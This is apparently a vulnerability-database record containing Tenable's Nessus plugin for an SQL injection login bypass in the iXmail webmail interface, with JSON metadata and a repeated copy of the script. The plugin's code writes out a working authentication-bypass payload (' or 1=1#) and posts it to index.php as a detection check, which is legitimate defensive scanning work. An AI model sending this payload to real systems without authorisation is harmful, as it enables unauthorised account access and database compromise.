ID IXMAIL_SQL_INJECTION.NASL Type nessus Reporter Tenable Modified 2018-06-13T00:00:00
Description
The remote host is running the iXmail webmail interface.
There is a flaw in this interface that allows an attacker to log in as any user by using a SQL injection flaw in the code of index.php.
An attacker may use this flaw to gain unauthorized access on this host, or to gain the control of the remote database.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if(description)
{
script_id(11782);
script_version ("1.21");
script_bugtraq_id(8047);
script_name(english:"iXmail index.php password Parameter SQL Injection");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is vulnerable to a SQL injection attack." );
script_set_attribute(attribute:"description", value:
"The remote host is running the iXmail webmail interface.
There is a flaw in this interface that allows an attacker to log in
as any user by using a SQL injection flaw in the code of index.php.
An attacker may use this flaw to gain unauthorized access on this
host, or to gain the control of the remote database." );
script_set_attribute(attribute:"solution", value:
"Upgrade to iXMail 0.4." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2003/06/27");
script_cvs_date("Date: 2018/06/13 18:56:27");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_summary(english: "Checks for iXMail");
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
script_family(english: "CGI abuses");
script_dependencie("find_service1.nasl", "http_version.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_keys("www/PHP");
exit(0);
}
# The script code starts here
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
if(!get_port_state(port)) exit(0);
if(!can_host_php(port:port)) exit(0);
name = rand_str(charset: "aegijlnoprsvw", length: 6);
data = "username="+name+"&password=%27+or+1%3D1%23&login=Login";
h = make_array("Content-Type", "application/x-www-form-urlencoded");
foreach dir ( cgi_dirs() )
{
r = http_send_recv3(port: port, method: 'POST', item: dir+"/index.php", add_headers: h);
if (isnull(r)) exit(0);
if(egrep(pattern:"^Location: ixmail_box\.php", string: r[1]))
{
security_hole(port);
set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
exit(0);
}
}
{"id": "IXMAIL_SQL_INJECTION.NASL", "bulletinFamily": "scanner", "title": "iXmail index.php password Parameter SQL Injection", "description": "The remote host is running the iXmail webmail interface. \n\nThere is a flaw in this interface that allows an attacker to log in as any user by using a SQL injection flaw in the code of index.php. \n\nAn attacker may use this flaw to gain unauthorized access on this host, or to gain the control of the remote database.", "published": "2003-06-27T00:00:00", "modified": "2018-06-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=11782", "reporter": "Tenable", "references": [], "cvelist": [], "type": "nessus", "lastseen": "2018-06-14T11:30:49", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote host is running the iXmail webmail interface. \n\nThere is a flaw in this interface that allows an attacker to log in as any user by using a SQL injection flaw in the code of index.php. \n\nAn attacker may use this flaw to gain unauthorized access on this host, or to gain the control of the remote database.", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "b4452e07452a00092b28db4b03412c264b3b8985ea0f06be1d794450fe74c9f8", "hashmap": [{"hash": "1a02f77e6ccb21d84fbb32adf71d5d81", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "30b4a92517ace5825f5944c8a794ad3e", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "266b86b535ff111110d654420ea4e162", "key": "modified"}, {"hash": "592a6c132c70f988b311ab8ffef33361", "key": "sourceData"}, {"hash": "52e862c9ceff49ce388b7ea1083e19b0", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "80cc28f24ec16187367899b0fff85629", "key": "title"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "5ee4f86df5fc6331602aad07338ac919", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=11782", "id": "IXMAIL_SQL_INJECTION.NASL", "lastseen": "2016-09-26T17:24:48", "modified": "2012-05-31T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "11782", "published": "2003-06-27T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(11782);\n script_version (\"$Revision: 1.20 $\");\n script_bugtraq_id(8047);\n script_osvdb_id(53714);\n \n script_name(english:\"iXmail index.php password Parameter SQL Injection\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is vulnerable to a SQL injection attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running the iXmail webmail interface. \n\nThere is a flaw in this interface that allows an attacker to log in\nas any user by using a SQL injection flaw in the code of index.php. \n\nAn attacker may use this flaw to gain unauthorized access on this\nhost, or to gain the control of the remote database.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to iXMail 0.4.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2003/06/27\");\n script_cvs_date(\"$Date: 2012/05/31 21:25:30 $\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english: \"Checks for iXMail\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2003-2012 Tenable Network Security, Inc.\");\n \n script_family(english: \"CGI abuses\");\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n# The script code starts here\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\nif(!get_port_state(port)) exit(0);\nif(!can_host_php(port:port)) exit(0);\n\nname = rand_str(charset: \"aegijlnoprsvw\", length: 6);\ndata = \"username=\"+name+\"&password=%27+or+1%3D1%23&login=Login\";\n\nh = make_array(\"Content-Type\", \"application/x-www-form-urlencoded\");\nforeach dir ( cgi_dirs() )\n{\n r = http_send_recv3(port: port, method: 'POST', item: dir+\"/index.php\", add_headers: h);\n if (isnull(r)) exit(0);\n if(egrep(pattern:\"^Location: ixmail_box\\.php\", string: r[1]))\n {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n}\n", "title": "iXmail index.php password Parameter SQL Injection", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:24:48"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "1a02f77e6ccb21d84fbb32adf71d5d81"}, {"key": "href", "hash": "5ee4f86df5fc6331602aad07338ac919"}, {"key": "modified", "hash": "5299677d29a0b2004584ce465e834b3e"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "30b4a92517ace5825f5944c8a794ad3e"}, {"key": "published", "hash": "52e862c9ceff49ce388b7ea1083e19b0"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "94589b4e57c56638c963bfa4e21bf7a8"}, {"key": "title", "hash": "80cc28f24ec16187367899b0fff85629"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "ce2ac00911668a2105fb2e7d1dad5277751e8996d16fd51a5752a558e176d665", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(11782);\n script_version (\"1.21\");\n script_bugtraq_id(8047);\n \n script_name(english:\"iXmail index.php password Parameter SQL Injection\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is vulnerable to a SQL injection attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running the iXmail webmail interface. \n\nThere is a flaw in this interface that allows an attacker to log in\nas any user by using a SQL injection flaw in the code of index.php. \n\nAn attacker may use this flaw to gain unauthorized access on this\nhost, or to gain the control of the remote database.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to iXMail 0.4.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2003/06/27\");\n script_cvs_date(\"Date: 2018/06/13 18:56:27\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english: \"Checks for iXMail\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.\");\n \n script_family(english: \"CGI abuses\");\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n# The script code starts here\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\nif(!get_port_state(port)) exit(0);\nif(!can_host_php(port:port)) exit(0);\n\nname = rand_str(charset: \"aegijlnoprsvw\", length: 6);\ndata = \"username=\"+name+\"&password=%27+or+1%3D1%23&login=Login\";\n\nh = make_array(\"Content-Type\", \"application/x-www-form-urlencoded\");\nforeach dir ( cgi_dirs() )\n{\n r = http_send_recv3(port: port, method: 'POST', item: dir+\"/index.php\", add_headers: h);\n if (isnull(r)) exit(0);\n if(egrep(pattern:\"^Location: ixmail_box\\.php\", string: r[1]))\n {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n}\n", "naslFamily": "CGI abuses", "pluginID": "11782", "cpe": []}
